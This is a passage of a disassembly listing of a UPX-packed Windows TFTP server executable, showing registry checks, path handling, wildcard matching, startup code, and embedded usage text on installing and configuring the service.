		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_100389F
; ---------------------------------------------------------------------------


loc_1003896:				; CODE XREF: sub_10037BF+CDj
		cmp	[ebp+var_C], 1
		jnz	short loc_100389F
		inc	[ebp+var_4]


loc_100389F:				; CODE XREF: sub_10037BF+D5j
					; sub_10037BF+DBj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D58
		push	eax
		push	ebx
		push	offset aReadable ; "readable"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_10038C6
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_10038CF
; ---------------------------------------------------------------------------


loc_10038C6:				; CODE XREF: sub_10037BF+FDj
		cmp	[ebp+var_C], 1
		jnz	short loc_10038CF
		inc	[ebp+var_4]


loc_10038CF:				; CODE XREF: sub_10037BF+105j
					; sub_10037BF+10Bj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D90
		push	eax
		push	ebx
		push	offset aWritable ; "writable"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_10038F6
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_10038FF
; ---------------------------------------------------------------------------


loc_10038F6:				; CODE XREF: sub_10037BF+12Dj
		cmp	[ebp+var_C], 1
		jnz	short loc_10038FF
		inc	[ebp+var_4]


loc_10038FF:				; CODE XREF: sub_10037BF+135j
					; sub_10037BF+13Bj
		push	[ebp+var_10]
		call	dword_100100C	; RegCloseKey
		mov	eax, [ebp+var_4]
		pop	esi
		pop	edi


loc_100390D:				; CODE XREF: sub_10037BF+32j
		pop	ebx
		leave
		retn
sub_10037BF	endp


; =============== S U B	R O U T	I N E =======================================



sub_1003910	proc near		; CODE XREF: sub_1001665+193p

var_1F4		= byte ptr -1F4h

		sub	esp, 1F4h
		cmp	byte ptr dword_1005E07+1, 0
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, 1F4h
		mov	ebx, (offset dword_1005E07+1)
		jnz	short loc_100393D
		push	ebp
		push	offset aTftpdroot ; "\\tftpdroot\\"
		push	ebx
		call	dword_1001148	; strncpy
		add	esp, 0Ch


loc_100393D:				; CODE XREF: sub_1003910+1Bj
		lea	eax, [esp+204h+var_1F4]
		push	ebp
		push	eax
		push	ebx
		call	dword_1001020	; ExpandEnvironmentStringsA
		test	eax, eax
		jnz	short loc_1003952
		push	57h
		jmp	short loc_10039CA
; ---------------------------------------------------------------------------


loc_1003952:				; CODE XREF: sub_1003910+3Cj
		mov	ecx, eax
		lea	esi, [esp+204h+var_1F4]
		mov	edi, ebx
		or	edx, 0FFFFFFFFh
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		xor	eax, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebx
		mov	ecx, edx
		repne scasb
		not	ecx
		dec	ecx
		cmp	byte ptr dword_1005E07[ecx], 2Fh
		lea	eax, dword_1005E07[ecx]
		jnz	short loc_1003986
		mov	byte ptr [eax],	5Ch


loc_1003986:				; CODE XREF: sub_1003910+71j
		cmp	byte ptr [eax],	5Ch
		jz	short loc_10039B7
		cmp	ecx, ebp
		jnb	short loc_10039B7
		mov	edi, offset asc_100155C	; "\\"
		mov	ecx, edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	esi, edi
		mov	ebp, ecx
		mov	edi, ebx
		mov	ecx, edx
		repne scasb
		mov	ecx, ebp
		dec	edi
		shr	ecx, 2
		rep movsd
		mov	ecx, ebp
		and	ecx, 3
		rep movsb


loc_10039B7:				; CODE XREF: sub_1003910+79j
					; sub_1003910+7Dj
		mov	edi, ebx
		mov	ecx, edx
		xor	eax, eax
		push	1
		repne scasb
		not	ecx
		dec	ecx
		mov	dword_1005FFC, ecx


loc_10039CA:				; CODE XREF: sub_1003910+40j
		pop	eax
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 1F4h
		retn
sub_1003910	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10039D6	proc near		; CODE XREF: sub_1002F31+148p
					; sub_1002F31+159p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	al, [esi]
		test	al, al
		jz	short loc_1003A2E
		cmp	al, 2Ah
		jz	short loc_1003A04
		cmp	al, 3Fh
		jz	short loc_10039F7
		mov	ecx, [ebp+arg_4]
		cmp	al, [ecx]
		jnz	short loc_1003A25
		inc	ecx
		push	ecx
		jmp	short loc_1003A01
; ---------------------------------------------------------------------------


loc_10039F7:				; CODE XREF: sub_10039D6+14j
		mov	eax, [ebp+arg_4]
		cmp	byte ptr [eax],	0
		jz	short loc_1003A25
		inc	eax
		push	eax


loc_1003A01:				; CODE XREF: sub_10039D6+1Fj
		inc	esi
		jmp	short loc_1003A1B
; ---------------------------------------------------------------------------


loc_1003A04:				; CODE XREF: sub_10039D6+10j
		mov	edi, [ebp+arg_4]
		lea	eax, [esi+1]
		push	edi
		push	eax
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003A29
		cmp	[edi], al
		jz	short loc_1003A25
		inc	edi
		push	edi


loc_1003A1B:				; CODE XREF: sub_10039D6+2Cj
		push	esi
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003A29


loc_1003A25:				; CODE XREF: sub_10039D6+1Bj
					; sub_10039D6+27j ...
		xor	eax, eax
		jmp	short loc_1003A38
; ---------------------------------------------------------------------------


loc_1003A29:				; CODE XREF: sub_10039D6+3Dj
					; sub_10039D6+4Dj
		push	1
		pop	eax
		jmp	short loc_1003A38
; ---------------------------------------------------------------------------


loc_1003A2E:				; CODE XREF: sub_10039D6+Cj
		mov	ecx, [ebp+arg_4]
		xor	eax, eax
		cmp	[ecx], al
		setz	al


loc_1003A38:				; CODE XREF: sub_10039D6+51j
					; sub_10039D6+56j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_10039D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A3E	proc near		; CODE XREF: sub_1001A91+5p
					; sub_100230A+8p ...
		jmp	dword_100116C
sub_1003A3E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A44	proc near		; CODE XREF: sub_10018DB+FEp
					; sub_1002219+DAp
		jmp	dword_1001138
sub_1003A44	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A4A	proc near		; CODE XREF: sub_1001FA6+1Fp
					; sub_1001FA6+43p
		jmp	dword_100113C
sub_1003A4A	endp

; ---------------------------------------------------------------------------


loc_1003A50:				; CODE XREF: UPX1:01009168j
		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_1001560
		push	offset loc_1003BF0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		add	esp, 0FFFFFFE0h
		push	ebx
		push	esi
		push	edi
		mov	[ebp-18h], esp
		mov	dword ptr [ebp-4], 0
		push	1
		call	dword_10010C4	; __set_app_type
		add	esp, 4
		mov	dword_10062D0, 0FFFFFFFFh
		mov	dword_10062D4, 0FFFFFFFFh
		call	dword_10010C8	; __p__fmode
		mov	ecx, dword_100600C
		mov	[eax], ecx
		call	dword_10010CC	; __p__commode
		mov	edx, dword_1006008
		mov	[eax], edx
		mov	eax, dword_10010D0
		mov	ecx, [eax]
		mov	dword_10062D8, ecx
		call	nullsub_2
		mov	eax, dword_1005DC4
		test	eax, eax
		jnz	short loc_1003AE1
		push	offset loc_1003BD0
		call	dword_1001084	; __setusermatherr
		add	esp, 4


loc_1003AE1:				; CODE XREF: seg000:01003AD1j
		call	sub_1003BB0
		push	offset dword_100500C
		push	offset dword_1005008
		call	sub_1003BA6	; _initterm
		add	esp, 8
		mov	edx, dword_1006004
		mov	[ebp-28h], edx
		lea	eax, [ebp-28h]
		push	eax
		mov	ecx, dword_1006000
		push	ecx
		lea	edx, [ebp-20h]
		push	edx
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-1Ch]
		push	ecx
		call	dword_1001080	; __getmainargs
		add	esp, 14h
		push	offset dword_1005004
		push	offset dword_1005000
		call	sub_1003BA6	; _initterm
		add	esp, 8
		call	dword_10010D8	; __p___initenv
		mov	edx, [ebp-20h]
		mov	[eax], edx
		mov	eax, [ebp-20h]
		push	eax
		mov	ecx, [ebp-2Ch]
		push	ecx
		mov	edx, [ebp-1Ch]
		push	edx
		call	sub_1001570
		add	esp, 0Ch
		mov	[ebp-24h], eax
		push	eax
		call	dword_10010EC	; exit
		jmp	short loc_1003B80
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-30h], ecx
		push	eax
		push	ecx
		call	sub_1003BA0
		add	esp, 8
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	edx, [ebp-30h]
		push	edx
		call	dword ptr loc_10010DD+3


loc_1003B80:				; CODE XREF: seg000:01003B5Cj
		add	esp, 4
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		mov	ecx, [ebp-10h]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA0	proc near		; CODE XREF: seg000:01003B6Ap
		jmp	dword ptr loc_10010DC
sub_1003BA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA6	proc near		; CODE XREF: seg000:01003AF0p
					; seg000:01003B2Bp
		jmp	dword_100107C
sub_1003BA6	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_1003BB0	proc near		; CODE XREF: seg000:loc_1003AE1p
		push	30000h
		push	10000h
		call	sub_1003BF6	; _controlfp
		add	esp, 8
		retn
sub_1003BB0	endp

; ---------------------------------------------------------------------------
		align 10h


loc_1003BD0:				; DATA XREF: seg000:01003AD3o
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
		align 10h


loc_1003BF0:				; DATA XREF: seg000:01003A5Ao
		jmp	dword ptr loc_10010C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BF6	proc near		; CODE XREF: sub_1003BB0+Ap
		jmp	dword_10010BC
sub_1003BF6	endp

; ---------------------------------------------------------------------------
		dd 501h	dup(0)
dword_1005000	dd 0		dword_1005004	dd 0		dword_1005008	dd 0		dword_100500C	dd 0		asc_1005010	db ' ================================================================'
					; DATA XREF: sub_1001570+4Do
		db '======== ',0Ah
		db 'Abstract:                                                        '
		db '         ',0Ah
		db ' This implements an RFC 783 tftp daemon.                         '
		db '         ',0Ah
		db ' It listens on port 69 for requests                              '
		db '         ',0Ah
		db ' and spawns a thread to process each request.                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'TFTPD USAGE and Installation:                                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db '  md d:/tftpd                                     (the StartDirec'
		db 'tory).   ',0Ah
		db '  copy //MohsinA_p90/test/tftpd.exe .                            '
		db '         ',0Ah
		db '  sc create tftpd binPath= d:/tftpd/tftpd.exe     (give full path'
		db ').       ',0Ah
		db '  sc query tftpd                                  (check if insta'
		db 'lled).   ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Start:                                                           '
		db '         ',0Ah
		db '    sc start tftpd -f                             (creates a log '
		db 'file).   ',0Ah
		db 'or  sc start tftpd                                               '
		db '         ',0Ah
		db 'or  net start tftpd                                              '
		db '         ',0Ah
		db 'or  sc start tftpd [-dStartDirectory] [-e] [-f]                  '
		db '         ',0Ah
		db '    Options: -e  use event log.                                  '
		db '         ',0Ah
		db '             -f  log to file.                                    '
		db '         ',0Ah
		db '             -dStartDirectory                                    '
		db '         ',0Ah
		db 'Info:                                                            '
		db '         ',0Ah
		db '  sc interrogate tftpd           (logs will be updated).         '
		db '         ',0Ah
		db '  sc query tftpd                 Check whether running.          '
		db '         ',0Ah
		db 'Stop:                                                            '
		db '         ',0Ah
		db '  sc  stop tftpd                                                 '
		db '         ',0Ah
		db '  net stop tftpd                                                 '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Variables that control what files can be read/written and by whom'
		db ':        ',0Ah
		db '   StartDirectory - only files there will be accessible.         '
		db '         ',0Ah
		db '                    LogFile is created here.                     '
		db '         ',0Ah
		db '   ValidClients - Clients matching this ip address can read files'
		db '.        ',0Ah
		db '                    eg. you can set it to "157.55.8?.*"          '
		db '       ',0Ah
		db '   ValidMasters   - clients matching this can write and read file'
		db 's.       ',0Ah
		db '                    eg. you can set it to "" and no one can write'
		db '.      ',0Ah
		db '   ValidReadFiles - only matching files will be served out, eg. "'
		db 'r*.t?t"',0Ah
		db '   ValidWriteFiles- only matching files will be accepted,  eg. "w'
		db '*.txt" ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Client:                                                          '
		db '         ',0Ah
		db '  tftp [-i] servername {get|put} src_file dest_file              '
		db '         ',0Ah
		db '  -i from binary mode, else ascii mode is used.                  '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db ' ================================================================'
		db '======== ',0Ah,0
		align 8
aTftpd		db 'Tftpd',0            ; DATA XREF: sub_1001665+Bo
					; seg000:off_1005CB0o
		align 10h
off_1005CB0	dd offset aTftpd	; DATA XREF: sub_1001570:loc_1001646o
					; "Tftpd"
		dd offset sub_1001665
		align 10h
off_1005CC0	dd offset aErrorUndefined ; DATA XREF: sub_100230A+73r
					; "Error undefined"
		dd offset aFileNotFound	; "File	not found"
		dd offset aAccessViolatio ; "Access violation"
		dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
		dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
		dd offset aUnknownTransfe ; "Unknown transfer ID"
		dd offset aFileAlreadyExi ; "File already exists"
		dd offset aNoSuchUser	; "No such user"
		dd offset aOptionNegotiat ; "Option negotiation	failure"
		align 8
dword_1005CE8	dd 2Ah,	0Dh dup(0)					; sub_10037BF+87o
dword_1005D20	dd 2Ah,	0Dh dup(0)					; sub_100333A+163o ...
dword_1005D58	dd 2Ah,	0Dh dup(0)					; sub_10037BF+EAo
dword_1005D90	dd 2Ah,	0Ch dup(0)					; sub_10037BF+11Ao
dword_1005DC4	dd 1				align 10h
dword_1005DD0	dd 0							; sub_1001E73:loc_1001F36r ...
dword_1005DD4	dd 0		dword_1005DD8	dd 0							; sub_1001665:loc_100182Er ...
dword_1005DDC	dd 0							; sub_1001665+8Br ...
dword_1005DE0	dd 0							; sub_1001E73:loc_1001F0Cr ...
		align 8
dword_1005DE8	dd 0							; sub_1001A91+2B3o
dword_1005DEC	dd 0							; sub_1001A1F+52r ...
dword_1005DF0	dd 0							; sub_1001A1F+5Ew ...
dword_1005DF4	dd 0							; sub_1001A91+59w ...
dword_1005DF8	dd 0							; sub_10018DB+EFr
dword_1005DFC	dd 0		dword_1005E00	dd 0							; sub_1002219+D5o
		db 3 dup(0)
dword_1005E07	dd 0							; sub_1003910+6Br ...
		align 4
		dd 7Ch dup(0)
dword_1005FFC	dd 0		dword_1006000	dd 0		dword_1006004	dd 0		dword_1006008	dd 0		dword_100600C	dd 0				dd 4 dup(0)
dword_1006020	dd 6 dup(0)						; seg000:01001D78o ...
dword_1006038	dd 0							; sub_10018DB+34w ...
dword_100603C	dd 0		dword_1006040	dd 0							; sub_1001DEB:loc_1001E35r
dword_1006044	dd 0							; sub_1001665+DBr ...
dword_1006048	dd 6 dup(0)	dword_1006060	dd 6 dup(0)						; sub_1001A1F+2o ...
dword_1006078	dd 0							; sub_10019F0+Fw ...
dword_100607C	dd 0		dword_1006080	dd 6 dup(0)						; sub_100287F+1o ...
dword_1006098	dd 0							; sub_10018DB+25w ...
dword_100609C	dd 0		dword_10060A0	dd 0							; sub_10018DB+A2r ...
		dd 7 dup(0)
dword_10060C0	dd 0							; sub_1001665:loc_1001857o
dword_10060C4	dd 0		dword_10060C8	dd 0		dword_10060CC	dd 0				dd 0Ch dup(0)
dword_1006100	dd 4 dup(0)						; sub_1002219:loc_10022E9o
dword_1006110	dd 0				align 10h
dword_1006120	dd 0							; sub_1001665+63o ...
dword_1006124	dd 0							; sub_1001665+D1w ...
dword_1006128	dd 0							; sub_1001665+E1w
dword_100612C	dd 0							; sub_1001E73+5Aw ...
dword_1006130	dd 0							; sub_1001E73+60w ...
dword_1006134	dd 0							; sub_1001665+EBw ...
dword_1006138	dd 0							; sub_1001665+F1w ...
		align 10h
dword_1006140	dd 64h dup(0)	dword_10062D0	dd 0FFFFFFFFh	dword_10062D4	dd 0FFFFFFFFh	dword_10062D8	dd 0				align 1000h
seg000		ends

; Section 2. (virtual address 00007000)
; Virtual size			: 00003000 (  12288.)
; Section size in file		: 00003000 (  12288.)
; Offset to raw	data for section: 00007000
; Flags	E0000040: Data Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX1		segment	para public 'CODE' use32
		assume cs:UPX1
		;org 1007000h
		assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1007000	dd 400h	dup(0)			dd 0C4h, 1Ch, 69784501h, 6F725074h, 73736563h, 78450100h
		dd 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h
		dd 417367h, 74654701h, 61636F4Ch, 6D69546Ch, 44010065h
		dd 74656C65h, 69724365h, 61636974h, 6365536Ch, 6E6F6974h
		dd 65530100h, 73614C74h, 72724574h, 100726Fh, 45746553h
		dd 746E6576h, 65520100h, 656D7573h, 65726854h, 1006461h
		dd 4C746547h, 45747361h, 726F7272h, 61570100h, 6F467469h
		dd 6E695372h, 4F656C67h, 63656A62h, 43010074h, 74616572h
		dd 65764565h, 41746Eh, 696E4901h, 6C616974h, 43657A69h
		dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70616548h
		dd 61657243h, 1006574h,	7661654Ch, 69724365h, 61636974h
		dd 6365536Ch, 6E6F6974h, 65480100h, 72467061h, 1006565h
		dd 736F6C43h, 6E614865h, 656C64h, 746E4501h, 72437265h
		dd 63697469h, 65536C61h, 6F697463h, 4901006Eh, 7265746Eh
		dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 69615701h
		dd 726F4674h, 746C754Dh, 656C7069h, 656A624Fh, 737463h
		dd 61654801h, 6C6C4170h, 100636Fh, 65736552h, 65764574h
		dd 100746Eh, 65656C53h,	54010070h, 6E457972h, 43726574h
		dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70737553h
		dd 54646E65h, 61657268h, 0D1000064h, 0
		dd 1000000h, 4F676552h,	4B6E6570h, 78457965h, 53010041h
		dd 74726174h, 76726553h, 43656369h, 446C7274h, 61707369h
		dd 65686374h, 1004172h,	51676552h, 79726575h, 756C6156h
		dd 41784565h, 65520100h, 6F6C4367h, 654B6573h, 52010079h
		dd 73696765h, 53726574h, 69767265h, 74436563h, 61486C72h
		dd 656C646Eh, 1004172h,	53746553h, 69767265h, 74536563h
		dd 73757461h, 0DE0000h,	1380000h, 4E010000h, 6669746Fh
		dd 64644179h, 61684372h, 65676Eh, 74654701h, 64417049h
		dd 61547264h, 656C62h, 0EB00h, 7C00h, 695F0100h, 7474696Eh
		dd 6D7265h, 675F5F01h, 616D7465h, 72616E69h, 1007367h
		dd 65735F5Fh, 65737574h, 74616D72h, 72726568h, 6C5F0100h
		dd 6B656573h, 635F0100h, 65736F6Ch, 725F0100h, 646165h
		dd 6C616D01h, 636F6Ch, 61657201h, 636F6C6Ch, 63660100h
		dd 65736F6Ch, 72660100h, 1006565h, 656D6974h, 635F0100h
		dd 72696468h, 655F0100h, 6F6E7272h, 6D5F0100h, 7269646Bh
		dd 6F660100h, 6E6570h, 69746301h, 100656Dh, 6E6F635Fh
		dd 6C6F7274h, 1007066h,	6378655Fh, 5F747065h, 646E6168h
		dd 3372656Ch, 5F5F0100h, 5F746573h, 5F707061h, 65707974h
		dd 5F5F0100h, 665F5F70h, 65646F6Dh, 5F5F0100h, 635F5F70h
		dd 6F6D6D6Fh, 1006564h,	6A64615Fh, 5F747375h, 76696466h
		dd 72700100h, 66746E69h, 5F5F0100h, 5F5F5F70h, 74696E69h
		dd 766E65h, 63585F01h, 69467470h, 7265746Ch, 655F0100h
		dd 746978h, 706F5F01h, 1006E65h, 6972775Fh, 1006574h, 74697865h
		dd 0F60000h, 1440000h, 6D010000h, 6F6D6D65h, 1006576h
		dd 6E727473h, 797063h, 75736901h, 72657070h, 6F740100h
		dd 65776F6Ch, 52010072h, 70556C74h, 65746164h, 656D6954h
		dd 52010072h, 65446C74h, 6574656Ch, 656D6954h, 5F010072h
		dd 69727473h, 706D63h, 6F746101h, 5F010069h, 616F7469h
		dd 74520100h, 7265446Ch, 73696765h, 57726574h, 45746961h
		dd 5F010078h, 736B6863h, 1006B74h, 436C7452h, 74616572h
		dd 6D695465h, 75517265h, 657565h, 6C745201h, 69676552h
		dd 72657473h, 74696157h, 74520100h, 6572436Ch, 54657461h
		dd 72656D69h, 1000000h,	0F40000h, 57010000h, 6F534153h
		dd 74656B63h, 6FFF0041h, 73FF00h, 41535701h, 6E657645h
		dd 6C655374h, 746365h, 10009FFh, 47415357h, 764F7465h
		dd 616C7265h, 64657070h, 75736552h, 0FF00746Ch,	5701000Fh
		dd 65524153h, 72467663h, 0FF006D6Fh, 5701000Ah,	6C434153h
		dd 4565736Fh, 746E6576h, 3FF00h, 0FF000CFFh, 37FF0002h
		dd 17FF00h, 14FFh, 0
		dd 4550h, 3014Ch, 3 dup(0)
		dd 30F00E0h, 0C05010Bh,	3400h, 1800h, 0
		dd 3A50h, 1000h, 5000h,	1000000h, 1000h, 200h, 2 dup(5)
		dd 4, 0
		dd 8000h, 600h,	0EDCBh,	80000003h, 40000h, 1000h, 100000h
		dd 1000h, 0
		dd 10h,	2 dup(0)
		dd 3BFCh, 8Ch, 7000h, 3D8h, 6 dup(0)
		dd 1180h, 1Ch, 8 dup(0)
		dd 238h, 88h, 1000h, 180h, 6 dup(0)
		dd 7865742Eh, 74h, 3310h, 1000h, 3400h,	600h, 3	dup(0)
		dd 60000020h, 7461642Eh, 61h, 12DCh, 5000h, 0E00h, 3A00h
		dd 3 dup(0)
		dd 0C0000040h, 7273722Eh, 63h, 3D8h, 7000h, 400h, 4800h
		dd 3 dup(0)
		dd 40000040h, 7000h, 3E08h, 749C0000h, 39000000h, 17C60D00h
		dd 0EB2E4A64h, 0C60F575Fh, 0B675827h, 0ECE325B7h, 0CCD6CF10h
		dd 59EDDE72h, 4339F017h, 0B3BF0F49h, 0D81474A3h, 0D356F440h
		dd 0F34912FBh, 0F9E28B41h, 7C9B3D2Dh, 408BCE3Bh, 0A74F620h
		dd 0B36820ECh, 301BFAD8h, 9A3516EBh, 6CD26FC5h,	439C9B51h
		dd 0F0C30D83h, 0ED3AA501h, 2F32104Dh, 832C6909h, 0F5501D57h
		dd 9060C060h, 447262Eh,	69295C54h, 9F0404FBh, 0FF840F55h
		dd 0ABFF70B8h, 98147D81h, 0F01EB5A2h, 0F8942804h, 7D6FD685h
		dd 558B38EBh, 3939B90Ch, 2A7E104Dh, 0AD4B0A2Dh,	750D8F01h
		dd 85DBFF53h, 575936Fh,	112E2780h, 8488D68Ah, 0FE009035h
		dd 0BE3C46FFh, 196D2AB5h, 297FB102h, 5256D97Ch,	0FA0F1Eh
		dd 0A378E8FAh, 0D8CAF6h, 8B9D12EBh, 88087C7h, 81E68A60h
		dd 5A1A9634h, 68A15356h, 0B41C0FF2h, 0F0108A68h, 128D8016h
		dd 5351630h, 440DCD00h,	86F4EA5h, 380929F2h, 0B6D8321Dh
		dd 586CDB68h, 40367508h, 6DF44CF8h, 0CCD1B2A4h,	504F8D71h
		dd 0B50C8948h, 0F07D4899h, 0B7174A1Eh, 40B0E86h, 3752239h
		dd 0B1C8E4C5h, 37326A6Eh, 5CE8315Fh, 9A012DCh, 343F516Bh
		dd 65739809h, 3201BC5Bh, 321C30FFh, 0E464D957h,	2FB45D20h
		dd 20472758h, 5C908827h, 244BF51Fh, 0FD0C1519h,	4B87C3FCh
		dd 1F5F5EC0h, 8005EC81h, 0E087023Dh, 57A9A8EDh,	0E8A00FBDh
		dd 0D70B0538h, 48096855h, 0A4553517h, 6F55959Ch, 546237ADh
		dd 5755ED20h, 0ADCE78EBh, 0B902AA58h, 0F72BFB9Ah, 0F01485C9h
		dd 7B980FBh, 0B7FF524Eh, 818D2F77h, 0C68606h, 5C38805Ch
		dd 0CD3B2C74h, 85658103h, 1E5CBFEBh, 3B252637h,	36E96CFBh
		dd 4D4FCD8Bh, 0FC434BCDh, 8B24A158h, 0FC0D894Fh, 9150005Fh
		dd 5D556BE3h, 16C3AE63h, 8E06FF88h, 0B3068A98h,	742A3C4Ah
		dd 743F3C1Ch, 7A56DA0Bh, 6F3A57DBh, 0AC514132h,	15730CEEh
		dd 0E23625E0h, 0EB46CE26h, 54210917h, 3CDB4A0Ah, 5068D670h
		dd 0D43814E2h, 0EE0F1D1Ah, 84188EA3h, 410AFC0Fh, 6E235CA6h
		dd 0CC01380Bh, 2333116Ch, 25FFE19Bh, 3805096Ch,	2B76793Ch
		dd 0FF6ABDD8h, 68C56068h, 0A164F2F0h, 0EF0B1343h, 8964548Eh
		dd 0E0320725h, 0AF68127h, 0E8658970h, 8B530F4Ah, 647EE736h
		dd 5C704C4h, 4362D0h, 47C4D409h, 0C81C416Ch, 0E7EF0C15h
		dd 80775B3h, 815CC0Dh, 0CD0A110h, 0B6E77C23h, 2CD8FA08h
		dd 0A1DC2BA8h, 0E845DC4h, 0DCD937E0h, 5878D068h, 68AC1B84h
		dd 503D9DB6h, 2A507A64h, 470816A2h, 0CF81DB37h,	0A5D85504h
		dd 8D510062h, 1BDB2355h, 0E52E0DBh, 0E44D3DD4h,	14803F51h
		dd 0AF92DD3h, 88003AF2h, 0A16DEDD8h, 46852CB5h,	0D44D3CE0h
		dd 3460C51h, 52E4DD8Eh,	146C051Eh, 0FE6750F9h, 0ECCF6D52h
		dd 0DCEC1F22h, 0D04D8909h, 0B76C5150h, 9C3EF9B6h, 2FFF8BC3h
		dd 0E0A152D0h, 9867B616h, 0F047EC0Ch, 0DE160D26h, 8BD77577h
		dd 90C35DE5h, 51DC5500h, 25E6CD74h, 0CC7C05h, 3BE7B068h
		dd 5F680AD0h, 90F24Fh, 30AC2D85h, 80D0F9Eh, 4FBE466Bh
		dd 0BCC0h, 807201h, 92A33D20h, 0A200FFFh, 74736241h, 74636172h
		dd 0C003203Ah, 200AF556h, 69AD6854h, 3FFF595h, 61EA6D40h
		dd 4652206Eh, 38372043h, 0F6002033h, 20A95776h,	6F186164h
		dd 0B64A2E6Eh, 497EAAD6h, 966C2074h, 0B56F4546h, 705EDD55h
		dd 360F726Fh, 0B0723639h, 0F652F556h, 0B0657571h, 1DEE95h
		dd 70733329h, 564A7761h, 61B6AAE5h, 26F46887h, 0B7557B76h
		dd 0A06F7253h, 5468630Eh, 1D942C02h, 0D8004A2Eh, 0A98007Fh
		dd 535520E8h, 0A0454741h, 0AAB78004h, 6C6174D9h, 56C82329h
		dd 7B958A42h, 26DBC00h,	3A648A6Dh, 2326A2Fh, 28009858h
		dd 7FFF6550h, 297342F6h, 6F634A2Eh, 2F207970h, 686F4D2Fh
		dd 0ED6E6973h, 41FB4333h, 3039705Fh, 2E5C6357h,	19377865h
		dd 2EB023DAh, 4D637395h, 76DBB2B7h, 99203EB6h, 0D505062h
		dd 0AB3D68h, 54596CFCh,	76696795h, 73165865h, 2770A063h
		dd 59574A91h, 0A5EA66B0h, 9E63E049h, 632E36D0h,	266D56Bh
		dd 116465A2h, 4EF08112h, 16373F76h, 0C13A8402h,	845173E2h
		dd 0E2B07650h, 59E0662Dh, 53802D00h, 3323841Ch,	0E02C4ECDh
		dd 0F0044A6Bh, 4A956446h, 0ACAAD813h, 5B954B73h, 0C61775F8h
		dd 5D81642Dh, 66046512h, 3010885Dh, 43352B4Ah, 0ED0856C0h
		dd 491E2030h, 0E2DAE0Fh, 2E09BA76h, 8772F083h, 64407014h
		dd 0F4940B23h, 0D9CE2E4Dh, 6116B40Ah, 6930544Ah, 56300252h
		dd 0DA920138h, 72CE8046h, 0E01488D9h, 0F146C602h, 0C9ADB5C9h
		dd 1D6272A6h, 29241B75h, 0D95A4A9Ah, 6E43834Ah,	7146D5C0h
		dd 0EF5B0577h, 966E6E75h, 78D08129h, 0E163388Eh, 0E0B020DAh
		dd 0C7B25003h, 4AEB945Bh, 14314AEBh, 5664AB58h,	0B040D130h
		dd 73BB6947h, 300AF003h, 0B89D9B50h, 0CE0408C4h, 63EB0C66h
		dd 0C184F041h, 2F20BBAFh, 0C26063BBh, 629B7D15h, 6D6F2579h
		dd 0B03190C4h, 2D96953Ah, 0DB043C64h, 47796CA5h, 600A65B6h
		dd 61C057DDh, 2E796907h, 1A029CE0h, 0D0494C43h,	5CB36BE1h
		dd 51829B4Ch, 6062B2Eh,	51682AC1h, 93D61DA0h, 0C5436D09h
		dd 0CE17856Dh, 96A09943h, 676464E0h, 734FB66Fh,	2EB8EEF1h
		dd 77630C95h, 7982654Ch, 7333756Fh, 3FFFD8DFh, 22E01F15h
		dd 2E373531h, 382E3535h, 222A2E3Fh, 8925B93h, 63952456h
